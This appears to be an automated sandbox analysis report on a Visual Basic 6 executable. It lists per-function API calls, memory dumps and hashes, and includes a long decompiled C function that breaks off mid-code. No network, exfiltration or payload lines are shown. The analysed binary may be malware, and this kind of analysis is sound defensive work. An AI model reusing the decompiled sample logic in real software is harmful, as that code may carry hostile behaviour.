                                                                                • __vbaGenerateBoundsError.MSVBVM60 ref: 0041D5A0
                                                                                • __vbaGenerateBoundsError.MSVBVM60 ref: 0041D5AA
                                                                                • __vbaGenerateBoundsError.MSVBVM60 ref: 0041D5E7
                                                                                • __vbaGenerateBoundsError.MSVBVM60 ref: 0041D5EF
                                                                                • __vbaGenerateBoundsError.MSVBVM60 ref: 0041D5FF
                                                                                • __vbaUbound.MSVBVM60(00000001), ref: 0041D62C
                                                                                • __vbaGenerateBoundsError.MSVBVM60 ref: 0041D667
                                                                                • __vbaGenerateBoundsError.MSVBVM60 ref: 0041D671
                                                                                • __vbaGenerateBoundsError.MSVBVM60 ref: 0041D68C
                                                                                • __vbaGenerateBoundsError.MSVBVM60 ref: 0041D6AC
                                                                                • __vbaGenerateBoundsError.MSVBVM60 ref: 0041D6B9
                                                                                • __vbaAryLock.MSVBVM60(?,?), ref: 0041D6EC
                                                                                • __vbaGenerateBoundsError.MSVBVM60 ref: 0041D716
                                                                                • __vbaGenerateBoundsError.MSVBVM60 ref: 0041D721
                                                                                • __vbaAryLock.MSVBVM60(?,00000000), ref: 0041D731
                                                                                • __vbaGenerateBoundsError.MSVBVM60 ref: 0041D74C
                                                                                • __vbaGenerateBoundsError.MSVBVM60 ref: 0041D754
                                                                                • __vbaUbound.MSVBVM60(00000001), ref: 0041D765
                                                                                • __vbaSetSystemError.MSVBVM60(?,?,-00000001), ref: 0041D797
                                                                                • __vbaAryUnlock.MSVBVM60(?), ref: 0041D7A7
                                                                                • __vbaAryUnlock.MSVBVM60(?), ref: 0041D7AD
                                                                                • __vbaUbound.MSVBVM60(00000001,00000000,00000000), ref: 0041D7B6
                                                                                • __vbaRedimPreserve.MSVBVM60(00000080,00000001,0041A58C,00000011,00000001,-00000002), ref: 0041D7D2
                                                                                • __vbaAryDestruct.MSVBVM60(00000000,?,0041D808), ref: 0041D801
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.2283539278.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.2283531510.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283673621.0000000000422000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283680882.0000000000423000.00000020.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283691498.000000000042A000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283696991.000000000042D000.00000002.00020000.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_tmp_e473b4.jbxd
                                                                                Similarity
                                                                                • API ID: __vba$Error$BoundsGenerate$Ubound$LockUnlock$Construct2DestructPreserveRedimSystem
                                                                                • String ID:
                                                                                • API String ID: 1905101958-0
                                                                                • Opcode ID: a8ad23f9dcfd01aeb99fb3139ad9a747c9cc8279730829ff87abc877471272d5
                                                                                • Instruction ID: c484b7153b9cc1c62c94cb45b4a2f5e62638fb072080c510f63cda569a4f04e1
                                                                                • Opcode Fuzzy Hash: a8ad23f9dcfd01aeb99fb3139ad9a747c9cc8279730829ff87abc877471272d5
                                                                                • Instruction Fuzzy Hash: A7919FB4E00215DFCB14DFA4D9C8AD9BBB5FF09341B108166E816AB361D7B8D8C1CB69
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0041E450, Relevance: 37.8, APIs: 25, Instructions: 257COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • __vbaNew2.MSVBVM60(0040B730,?,00000000,?,00401668), ref: 0041E49C
                                                                                • __vbaObjSetAddref.MSVBVM60(?,00000000,00000000,?,00401668), ref: 0041E4A9
                                                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00411158,00000028), ref: 0041E4D4
                                                                                • __vbaVarTextTstNe.MSVBVM60(?,?), ref: 0041E4E1
                                                                                • __vbaFreeVar.MSVBVM60 ref: 0041E4EC
                                                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00411158,00000024), ref: 0041E521
                                                                                • __vbaObjSet.MSVBVM60(?,?), ref: 0041E52E
                                                                                • __vbaFreeObj.MSVBVM60(0041E567), ref: 0041E560
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.2283539278.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.2283531510.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283673621.0000000000422000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283680882.0000000000423000.00000020.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283691498.000000000042A000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283696991.000000000042D000.00000002.00020000.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_tmp_e473b4.jbxd
                                                                                Similarity
                                                                                • API ID: __vba$CheckFreeHresult$AddrefNew2Text
                                                                                • String ID:
                                                                                • API String ID: 4148645594-0
                                                                                • Opcode ID: 80fb95d01ea5f713bce111d37e34614ee59498b58a6ea8c2ebd7a0952463763a
                                                                                • Instruction ID: f17fdf129ea994bf7013bdddb3dd996df24d5ced4d5fd2098d98c95f473ad1e0
                                                                                • Opcode Fuzzy Hash: 80fb95d01ea5f713bce111d37e34614ee59498b58a6ea8c2ebd7a0952463763a
                                                                                • Instruction Fuzzy Hash: 2E916174900209AFDB14DF95CD89EEEBBB9FF58701F10411AF901B72A0D7749985CBA8
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0041EDC0, Relevance: 37.8, APIs: 25, Instructions: 257COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • __vbaNew2.MSVBVM60(0040B83C,?,00000000,?,?), ref: 0041EE0C
                                                                                • __vbaObjSetAddref.MSVBVM60(?,?,00000000,?,?), ref: 0041EE19
                                                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,0041124C,00000020), ref: 0041EE44
                                                                                • __vbaVarTextTstNe.MSVBVM60(?,?), ref: 0041EE51
                                                                                • __vbaFreeVar.MSVBVM60 ref: 0041EE5C
                                                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,0041124C,00000028), ref: 0041EE91
                                                                                • __vbaObjSet.MSVBVM60(?,?), ref: 0041EE9E
                                                                                • __vbaFreeObj.MSVBVM60(0041EED7), ref: 0041EED0
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.2283539278.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.2283531510.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283673621.0000000000422000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283680882.0000000000423000.00000020.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283691498.000000000042A000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283696991.000000000042D000.00000002.00020000.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_tmp_e473b4.jbxd
                                                                                Similarity
                                                                                • API ID: __vba$CheckFreeHresult$AddrefNew2Text
                                                                                • String ID:
                                                                                • API String ID: 4148645594-0
                                                                                • Opcode ID: 5a7762a4c5a1fbe5bcf878ec64fe97f77bc5abc50d34bcd47220fff9c1233cc3
                                                                                • Instruction ID: 7cd1b4a5051931092e980ba27b48fc563e75ac000a27d3a4931071aa543f0103
                                                                                • Opcode Fuzzy Hash: 5a7762a4c5a1fbe5bcf878ec64fe97f77bc5abc50d34bcd47220fff9c1233cc3
                                                                                • Instruction Fuzzy Hash: 33914075900209AFCB14DF95CD88EEEBBB8FF48701F10811AF555B72A1D778A846CB68
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0041DB10, Relevance: 37.8, APIs: 25, Instructions: 257COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • __vbaNew2.MSVBVM60(0040B730,00000000,00000000,00000000,?), ref: 0041DB5C
                                                                                • __vbaObjSetAddref.MSVBVM60(?,?,00000000,00000000,?), ref: 0041DB69
                                                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00411158,00000028), ref: 0041DB94
                                                                                • __vbaVarTextTstNe.MSVBVM60(?,?), ref: 0041DBA1
                                                                                • __vbaFreeVar.MSVBVM60 ref: 0041DBAC
                                                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,00411158,00000024), ref: 0041DBE1
                                                                                • __vbaObjSet.MSVBVM60(?,?), ref: 0041DBEE
                                                                                • __vbaFreeObj.MSVBVM60(0041DC27), ref: 0041DC20
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.2283539278.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.2283531510.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283673621.0000000000422000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283680882.0000000000423000.00000020.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283691498.000000000042A000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283696991.000000000042D000.00000002.00020000.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_tmp_e473b4.jbxd
                                                                                Similarity
                                                                                • API ID: __vba$CheckFreeHresult$AddrefNew2Text
                                                                                • String ID:
                                                                                • API String ID: 4148645594-0
                                                                                • Opcode ID: 1c8f982e608a3b3c4faed6ec19ba6c2181716eb0c28b32470594ae71323303db
                                                                                • Instruction ID: 99d47f10f5cb731ab24f51dbfa51da87ee911a75198df4938470c603465efe0e
                                                                                • Opcode Fuzzy Hash: 1c8f982e608a3b3c4faed6ec19ba6c2181716eb0c28b32470594ae71323303db
                                                                                • Instruction Fuzzy Hash: 08912CB0E00209AFCB14DFA5DD88EEEB7B9FF58701F10851AF505A72A0D778A945CB64
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0041EB10, Relevance: 37.7, APIs: 25, Instructions: 217COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • __vbaNew2.MSVBVM60(0040B83C,?,00000000,00401720,00000000), ref: 0041EB74
                                                                                • __vbaObjSetAddref.MSVBVM60(?,?,00000000,00401720,00000000), ref: 0041EB81
                                                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,0041124C,00000020), ref: 0041EBB2
                                                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,0041124C,00000020), ref: 0041EBD9
                                                                                • __vbaVarTextCmpNe.MSVBVM60(?,?,?), ref: 0041EBEA
                                                                                • __vbaVarVargNofree.MSVBVM60(?,00000000), ref: 0041EBFA
                                                                                • __vbaVarTextCmpNe.MSVBVM60(?,00000000), ref: 0041EC05
                                                                                • __vbaVarAnd.MSVBVM60(?,00000000), ref: 0041EC0C
                                                                                • __vbaBoolVarNull.MSVBVM60(00000000), ref: 0041EC13
                                                                                • __vbaFreeVarList.MSVBVM60(00000002,?,?), ref: 0041EC25
                                                                                • __vbaObjSetAddref.MSVBVM60(?,?), ref: 0041EC3B
                                                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,0041124C,00000028), ref: 0041EC60
                                                                                • __vbaObjSet.MSVBVM60(?,?), ref: 0041EC71
                                                                                • __vbaObjIs.MSVBVM60(?,00000000), ref: 0041EC8A
                                                                                • __vbaObjIs.MSVBVM60(?,00000000), ref: 0041ECAF
                                                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,0041124C,00000028), ref: 0041ECD5
                                                                                • __vbaObjSetAddref.MSVBVM60(?,?), ref: 0041ECDF
                                                                                • __vbaFreeObj.MSVBVM60 ref: 0041ECE8
                                                                                • __vbaFreeObj.MSVBVM60(0041EDA3), ref: 0041ED9B
                                                                                • __vbaFreeObj.MSVBVM60 ref: 0041EDA0
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.2283539278.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.2283531510.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283673621.0000000000422000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283680882.0000000000423000.00000020.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283691498.000000000042A000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283696991.000000000042D000.00000002.00020000.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_tmp_e473b4.jbxd
                                                                                Similarity
                                                                                • API ID: __vba$CheckFreeHresult$Addref$Text$BoolListNew2NofreeNullVarg
                                                                                • String ID:
                                                                                • API String ID: 1104298945-0
                                                                                • Opcode ID: 7e6cefaa54a843e35a4180066d965740704f53dabcccb615c4431e20f7cd9adb
                                                                                • Instruction ID: f1e13b1aa51e8554ba06be954cadd588f2b43fe81521c0aa416fbd403c300d70
                                                                                • Opcode Fuzzy Hash: 7e6cefaa54a843e35a4180066d965740704f53dabcccb615c4431e20f7cd9adb
                                                                                • Instruction Fuzzy Hash: 35812CB5900219AFCB10DF95DD89EEEBBB8FF48B00F104159F605F71A0D674A945CBA4
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00425DD0, Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 158COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • __vbaNew2.MSVBVM60(004104D8,0042AA34), ref: 00425E58
                                                                                • __vbaHresultCheckObj.MSVBVM60(00000000,0258F774,004104C8,00000014), ref: 00425E7D
                                                                                • __vbaHresultCheckObj.MSVBVM60(00000000,?,004104E8,00000050), ref: 00425EA1
                                                                                • __vbaStrCat.MSVBVM60(\Sounds\Click.wav,?,00000000,00000001), ref: 00425EB3
                                                                                • __vbaStrMove.MSVBVM60 ref: 00425EBE
                                                                                • __vbaStrToAnsi.MSVBVM60(?,00000000), ref: 00425EC9
                                                                                • __vbaSetSystemError.MSVBVM60(00000000), ref: 00425ED5
                                                                                • __vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 00425EE9
                                                                                • __vbaFreeObj.MSVBVM60 ref: 00425EF5
                                                                                • __vbaVarDup.MSVBVM60 ref: 00425F2D
                                                                                • __vbaVarDup.MSVBVM60 ref: 00425F3F
                                                                                • #595.MSVBVM60(?,00000004,?,?,?), ref: 00425F53
                                                                                • __vbaStrI4.MSVBVM60(00000000), ref: 00425F5A
                                                                                • __vbaStrMove.MSVBVM60 ref: 00425F65
                                                                                • __vbaFreeVarList.MSVBVM60(00000004,?,?,?,?), ref: 00425F7D
                                                                                • __vbaR8Str.MSVBVM60(?), ref: 00425F8A
                                                                                • __vbaFreeStr.MSVBVM60(00425FFA), ref: 00425FF3
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.2283680882.0000000000423000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.2283531510.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283539278.0000000000401000.00000020.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283673621.0000000000422000.00000040.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283691498.000000000042A000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000008.00000002.2283696991.000000000042D000.00000002.00020000.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_tmp_e473b4.jbxd
                                                                                Similarity
                                                                                • API ID: __vba$Free$CheckHresultListMove$#595AnsiErrorNew2System
                                                                                • String ID: Are you sure you want to start a new game?$Aseb$\Sounds\Click.wav
                                                                                • API String ID: 2274796182-1790726986
                                                                                • Opcode ID: 7e048dabae48a738049e64f0c7c78aa2643a052cc66b563a88f36a7e692c6bc8
                                                                                • Instruction ID: 4862316b511b408063ca9b18851ad709a6b62394f4d01c52bdd17cce92a381fa
                                                                                • Opcode Fuzzy Hash: 7e048dabae48a738049e64f0c7c78aa2643a052cc66b563a88f36a7e692c6bc8
                                                                                • Instruction Fuzzy Hash: A3511AB1D00209AFDB14DF94D989AEEBFB8FF58300F10416AE646B72A0DB785585CF64
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004230D0, Relevance: 33.4, APIs: 18, Strings: 1, Instructions: 163COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 29%
                                                                                			E004230D0(void* __ebx, void* __edi, void* __esi, signed int __fp0, signed int* _a4, intOrPtr _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v36;
				char _v52;
				intOrPtr _v192;
				intOrPtr _v220;
				signed int _v250;
				intOrPtr _v264;
				intOrPtr _v276;
				char _v284;
				char _v288;
				void _v304;
				intOrPtr _v328;
				char _v344;
				char _v348;
				intOrPtr _v352;
				char _v376;
				intOrPtr _v392;
				signed int _v400;
				char _v408;
				intOrPtr _v416;
				char _v424;
				char _v428;
				intOrPtr _v520;
				void _v580;
				void _v616;
				intOrPtr _v620;
				char _v628;
				void _v640;
				void* _v644;
				char _v648;
				int _v652;
				int _v656;
				char _v660;
				signed int _v664;
				char _v668;
				intOrPtr _v672;
				char _v676;
				intOrPtr _v680;
				intOrPtr _v684;
				short _v908;
				intOrPtr _v922;
				void _v924;
				signed int _v948;
				intOrPtr _v960;
				char _v964;
				char _v968;
				char _v972;
				intOrPtr _v984;
				intOrPtr _v1124;
				void _v1236;
				intOrPtr _v1240;
				intOrPtr _v1244;
				signed int _v1248;
				signed int _v1252;
				signed int _v1256;
				signed int _v1260;
				void* _v1264;
				signed int _v1268;
				signed int _v1272;
				signed int _v1276;
				signed int _v1280;
				signed int _v1284;
				intOrPtr _v1288;
				signed int _v1292;
				char _v1296;
				signed int _v1300;
				signed int _v1316;
				signed int _v1496;
				void _v1544;
				signed int _v1552;
				signed int _v1556;
				signed int _v1560;
				signed int _v1564;
				void* _v1568;
				signed int _v1572;
				char _v1576;
				signed int _v1580;
				signed int _v1584;
				signed int _v1592;
				char _v1596;
				intOrPtr _v1600;
				void _v1856;
				intOrPtr _v1860;
				intOrPtr _v1868;
				intOrPtr _v1872;
				void* _t216;
				intOrPtr _t221;
				signed int _t227;
				void* _t231;
				void* _t233;
				signed int _t234;
				void* _t236;
				void* _t238;
				void* _t241;
				void* _t244;
				void* _t246;
				void* _t250;
				signed int _t253;
				int _t255;
				signed int _t258;
				signed int _t259;
				void* _t261;
				signed int _t262;
				signed int _t265;
				signed int _t267;
				signed int _t268;
				void* _t270;
				signed int _t271;
				signed int _t273;
				signed int _t278;
				signed int _t280;
				signed int _t281;
				signed int _t286;
				signed int* _t287;
				signed int _t288;
				signed int _t290;
				signed int _t291;
				signed int _t293;
				signed int _t297;
				signed int _t304;
				signed int _t305;
				signed int _t306;
				void* _t307;
				intOrPtr _t309;
				signed int _t310;
				void* _t313;
				void* _t317;
				void* _t324;
				void* _t326;
				void* _t330;
				signed int _t333;
				signed int _t334;
				void* _t337;
				signed int _t339;
				signed int _t340;
				signed int _t341;
				intOrPtr _t342;
				void* _t344;
				void* _t346;
				signed int _t349;
				signed int _t354;
				signed int _t355;
				signed int _t357;
				void* _t359;
				signed int _t361;
				signed int _t365;
				signed int _t368;
				void* _t381;
				void* _t383;
				void* _t384;
				void* _t395;
				signed int* _t397;
				void* _t399;
				signed int _t401;
				intOrPtr* _t403;
				intOrPtr _t453;
				signed int _t454;
				signed int _t455;
				signed int _t457;
				signed int _t458;
				signed int _t460;
				signed int _t467;
				short _t491;
				signed int _t494;
				signed int _t502;
				signed int _t507;
				signed int _t515;
				intOrPtr* _t516;
				intOrPtr* _t517;
				void* _t524;
				void* _t528;
				signed int _t529;
				intOrPtr _t532;
				signed int _t536;
				intOrPtr* _t540;
				intOrPtr* _t553;
				intOrPtr* _t557;
				signed int _t558;
				intOrPtr _t559;
				intOrPtr _t561;
				signed int _t562;
				signed int _t564;
				signed int _t565;
				signed int _t566;
				signed int _t567;
				signed int _t568;
				signed int _t569;
				signed int _t577;
				intOrPtr* _t586;
				void* _t587;
				signed int _t588;
				signed int _t598;
				intOrPtr _t599;
				intOrPtr _t600;
				void* _t601;
				void* _t605;
				void* _t609;
				void* _t611;
				void* _t614;
				intOrPtr _t615;
				signed int _t637;

				_t637 = __fp0;
				_t588 = _t598;
				_t599 = _t598 - 8;
				 *[fs:0x0] = _t599;
				_t600 = _t599 - 0x1a0;
				_v12 = _t600;
				_v8 = 0x401bb8;
				_t397 = _a4;
				memset( &_v304, 0, 0x3e << 2);
				_t601 = _t600 + 0xc;
				_v36 = 0;
				_v52 = 0;
				_v328 = 0;
				_v344 = 0;
				_v348 = 0;
				_v352 = 0;
				_t515 = 0;
				_v376 = 0;
				_v392 = 0;
				_v408 = 0;
				_v424 = 0;
				_v428 = 0;
				_t216 = L00423E30(_t397, 0, _t397);
				__imp____vbaCheckTypeVar( &_v344, 0x411a18,  &_v304, __edi, __esi, __ebx,  *[fs:0x0], 0x401d26, _t587);
				if(_t216 != 0) {
					__imp____vbaVarLateMemCallLd( &_v376,  &_v344, L"hwnd", 0);
					_t553 = __imp____vbaI4Var;
					_t601 = _t601 + 0x10;
					_v428 = 0;
					_t395 =  *_t553( &_v376,  *_t553( &_v52, 1,  &_v428));
					E0040F5DC();
					__imp____vbaSetSystemError(_t395);
					__imp____vbaFreeVar();
					_t515 =  ~(0 | _t395 > 0x00000000);
				}
				_v400 = _t515;
				_t516 = __imp____vbaVarMove;
				_v408 = 0xb;
				 *_t516();
				_push( &_v348);
				_push(_t397);
				L110();
				_push(_v348);
				E00423CC0(_t397, 0, _t588, _t397);
				_push(_v348);
				L11();
				_push(_v348);
				L45();
				_push(_v348);
				L82();
				_push(_v348);
				L22();
				_t221 = _a12;
				if(_t221 != 0) {
					_push(0x8000);
					_push(0);
					_push(_t221);
					E00423FF0();
				}
				__imp__#535();
				_v400 = _t637;
				_v408 = 4;
				 *_t516();
				_t557 = __imp____vbaVarTstLt;
				_t517 = __imp____vbaVarSub;
				while(1) {
					__imp__#535();
					_v400 = _t637;
					_v408 = 4;
					_v416 = 1;
					_v424 = 0x8002;
					_push( *_t517( &_v376,  &_v36,  &_v408));
					_push( &_v424);
					if( *_t557() == 0) {
						break;
					}
					__imp__#598();
				}
				_t227 = _v264 + _v348;
				__eflags = _t227;
				if(_t227 < 0) {
					__imp____vbaErrorOverflow();
					0;
					_push(0x8002);
					_v660 = 0;
					_push(_t557);
					_v656 = 0;
					_push(_t517);
					_v652 = 0;
					_v648 = 0;
					_t231 = memset( &_v580, memset( &_v616, memset( &_v640, 0, 6 << 2), 9 << 2), 0x12 << 2);
					_t605 = _t601 - 0x9c + 0x24;
					_t558 = 0;
					_t399 = 0;
					_v644 = _t231;
					_v664 = _t231;
					_t524 = E00424080();
					_t233 = E004240A0( &_v640);
					_push( &_v668);
					_push(0x18);
					_push(_t233);
					_push(0);
					_push(_t524);
					_t234 = E00424090();
					__eflags = _t234 - 0xc0000004;
					if(_t234 != 0xc0000004) {
						L16:
						__eflags = _t234;
						if(_t234 != 0) {
							_t399 = 6;
						}
						__eflags = _t558;
						if(_t558 != 0) {
							_t250 = E004240A0( &_v640);
							_push(0x18);
							_push(_t558);
							_push(_t250);
							E00424000();
						}
						_t236 = E004240A0( &_v660);
						_push(0x14);
						_push(_v640);
						_push(_t236);
						E00424000();
						_t559 = _v520;
						_v668 = _t559;
						_t238 = E004240A0( &_v676);
						_push(0x14);
						_push(_t238);
						_push(_v656);
						E00424000();
						_t241 = E004240A0( &_v648);
						_push(0x24);
						_push(_v684);
						_push(_t241);
						E00424000();
						_t244 = E004240A0( &_v628);
						_push(0x48);
						_push(_v656);
						_push(_t244);
						E00424000();
						_v620 = _t559;
						_t246 = E004240A0( &_v644);
						_push(0x48);
						_push(_t246);
						_push(_v672);
						E00424000();
						return _t399;
					} else {
						while(1) {
							_t253 = _v664 * 2;
							__eflags = _t253;
							if(_t253 < 0) {
								break;
							}
							__eflags = _t558;
							_v664 = _t253;
							if(_t558 != 0) {
								_t384 = E00424070();
								_push(_t558);
								_push(1);
								_push(_t384);
								E00424060();
							}
							_t381 = E00424070();
							_push(_v664);
							_push(1);
							_push(_t381);
							_t558 = E00424050();
							_t383 = E00424080();
							_push( &_v676);
							_push(_v676);
							_push(_t558);
							_push(0);
							_push(_t383);
							_t234 = E00424090();
							__eflags = _t234 - 0xc0000004;
							if(_t234 == 0xc0000004) {
								continue;
							} else {
								goto L16;
							}
							goto L136;
						}
						__imp____vbaErrorOverflow();
						_push(_t399);
						_push(_t588);
						_push(_t558);
						_push(_t524);
						_t401 = 0;
						_t255 = memset( &_v924, 0, 0x3e << 2);
						_t528 =  &_v964;
						memset(_t528, _t255, 0xa << 2);
						_t609 = _t605 - 0x124 + 0x18;
						_t529 = _t528 + 0xa;
						_push( &_v924);
						_v968 = 0;
						_t561 = 0;
						_t258 = L00423E30(0, 0, _v672);
						__eflags = _t258;
						if(_t258 != 0) {
							_t491 = _v908;
							_t259 = _t258 + 4;
							__eflags = _t259;
							if(_t259 < 0) {
								L44:
								__imp____vbaErrorOverflow();
								_push(_t401);
								_push(_t561);
								_push(_t529);
								_t261 = memset( &_v1236, 0, 0x3e << 2);
								_t611 = _t609 - 0x120 + 0xc;
								_t532 = _v984;
								_v1268 = _t261;
								_v1264 = _t261;
								_v1260 = _t261;
								_t562 = 0;
								_v1256 = _t261;
								_v1244 = 0;
								_push( &_v1236);
								_v1272 = 0;
								_v1252 = _t261;
								_v1276 = 0;
								_v1240 = 0;
								_t262 = L00423E30(_t401, 0, _t532);
								__eflags = _t262;
								if(_t262 != 0) {
									__eflags = _v1124 - 1;
									if(_v1124 <= 1) {
										L80:
										return _t562;
									} else {
										_push( &_v1248);
										_t265 = E00423F10(_t401, 0, _t532, 1);
										__eflags = _t265;
										if(_t265 != 0) {
											__eflags = _v1248;
											if(_v1248 <= 0) {
												goto L80;
											} else {
												_t267 = _v1252;
												__eflags = _t267;
												if(_t267 <= 0) {
													goto L80;
												} else {
													_t268 = _t267 + _t532;
													__eflags = _t268;
													if(_t268 < 0) {
														L81:
														__imp____vbaErrorOverflow();
														_push(_t588);
														_push(_t562);
														_push(_t532);
														_t270 = memset( &_v1544, 0, 0x3e << 2);
														_t614 = _t611 - 0x114 + 0xc;
														_t536 = _v1292;
														_t564 = 0;
														_v1568 = _t270;
														_v1556 = 0;
														_push( &_v1544);
														_v1572 = 0;
														_v1564 = _t270;
														_v1560 = 0;
														_v1552 = 0;
														_t271 = L00423E30(_t401, 0, _t536);
														__eflags = _t271;
														if(_t271 != 0) {
															_t494 = _v1496;
															_t273 = _t536 - _t494;
															__eflags = _t273;
															if(_t273 < 0) {
																L109:
																__imp____vbaErrorOverflow();
																_push(_t588);
																_t615 = _t614 - 8;
																_push(0x401d26);
																_push( *[fs:0x0]);
																 *[fs:0x0] = _t615;
																_push(_t401);
																_push(_t564);
																_push(_t536);
																_v1600 = _t615 - 0x11c;
																_v1596 = 0x401bc8;
																memset( &_v1856, 0, 0x3e << 2);
																_push( &_v1856);
																_v1860 = 0;
																_v1868 = 0;
																_v1872 = 0;
																_t278 = L00423E30(_t401, _t564, _v1584);
																__eflags = _t278;
																if(_t278 != 0) {
																	__eflags =  *0x42aa34; // 0x258f774
																	if(__eflags == 0) {
																		__imp____vbaNew2(0x4104d8, 0x42aa34);
																	}
																	_t565 =  *0x42aa34; // 0x258f774
																	_t280 =  *((intOrPtr*)( *_t565 + 0x48))(_t565, 0x1af6,  &_v284);
																	__eflags = _t280;
																	asm("fclex");
																	if(_t280 >= 0) {
																		_t403 = __imp____vbaHresultCheckObj;
																	} else {
																		_t403 = __imp____vbaHresultCheckObj;
																		 *_t403(_t280, _t565, 0x4104c8, 0x48);
																	}
																	__eflags =  *0x42aa34; // 0x258f774
																	if(__eflags == 0) {
																		__imp____vbaNew2(0x4104d8, 0x42aa34);
																	}
																	_t566 =  *0x42aa34; // 0x258f774
																	_t281 =  *((intOrPtr*)( *_t566 + 0x48))(_t566, 0x1af8,  &_v288);
																	__eflags = _t281;
																	asm("fclex");
																	if(_t281 < 0) {
																		 *_t403(_t281, _t566, 0x4104c8, 0x48);
																	}
																	_t540 = __imp____vbaI4Str;
																	_t286 = E00423FD0();
																	_t567 = _t286;
																	__imp____vbaFreeStrList(2,  &_v284,  &_v288, _v220, _v192,  *_t540(_v284,  *_t540(_v288)));
																	__eflags = _t567;
																	if(_t567 != 0) {
																		L134:
																		_t287 = _a4;
																		_push(0x423ca1);
																		 *_t287 = _t567;
																		return _t287;
																	} else {
																		__eflags = _v250 & 0x00000001;
																		if((_v250 & 0x00000001) == 0) {
																			_t288 =  *0x42aa34; // 0x258f774
																			__eflags = _t288;
																			if(_t288 == 0) {
																				__imp____vbaNew2(0x4104d8, 0x42aa34);
																			}
																			_t568 =  *0x42aa34; // 0x258f774
																			_t290 =  *((intOrPtr*)( *_t568 + 0x48))(_t568, 0x1af6,  &_v284);
																			__eflags = _t290;
																			asm("fclex");
																			if(_t290 < 0) {
																				 *_t403(_t290, _t568, 0x4104c8, 0x48);
																			}
																			_t291 =  *0x42aa34; // 0x258f774
																			__eflags = _t291;
																			if(_t291 == 0) {
																				__imp____vbaNew2(0x4104d8, 0x42aa34);
																			}
																			_t569 =  *0x42aa34; // 0x258f774
																			_t293 =  *((intOrPtr*)( *_t569 + 0x48))(_t569, 0x1af8,  &_v288);
